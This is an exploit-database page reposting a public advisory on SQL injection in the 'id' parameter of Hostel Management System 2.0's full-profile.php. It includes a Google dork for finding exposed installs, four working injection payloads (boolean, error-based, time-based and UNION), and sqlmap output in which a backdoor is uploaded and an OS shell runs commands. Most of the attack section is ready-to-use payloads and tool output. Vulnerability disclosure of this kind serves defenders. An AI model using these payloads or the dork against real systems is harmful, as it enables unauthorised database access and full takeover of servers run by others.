Advertisement






Hostel Management System 2.0 id SQL Injection

CVE Category Price Severity
CWE-89 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2020-01-11
CVSS EPSS EPSSP
CVSS:4.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.0158 0.28334

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020010086

Below is a copy:

Hostel Management System 2.0 id SQL Injection
# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection
# Google Dork: intitle: "Hostel management system"
# Date: 2020-01-03
# Exploit Author: FULLSHADE
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/hostel-management-system/
# Version: v2.0
# Tested on: Windows
# CVE : N/A

Description:

The Hostel Management System v2.0 application from PHPgurukul is vulnerable to
SQL injection via the 'id' parameter on the full-profile.php page.

==================== 1. SQLi ====================

http://10.0.0.214/Hostel%20management%20System%20Project/hostel/full-profile.php?id=1

THe ?id parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated
user has the full ability to run system commands via --os-shell and fully compromise the system

GET parameter 'id' is vulnerable.

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-3444' OR 1650=1650#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' OR (SELECT 3801 FROM(SELECT COUNT(*),CONCAT(0x7176627a71,(SELECT (ELT(3801=3801,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- klCZ

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=1' OR SLEEP(5)-- slKU

    Type: UNION query
    Title: MySQL UNION query (NULL) - 29 columns
    Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x63786c795a416371494752765744487a4e6443636e705076586e714d735a7053595a4b676b526157,0x71707a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

[14:20:08] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpulczr.php
[14:20:08] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpbjdvm.php
[14:20:08] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'john-pc\john'
os-shell>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum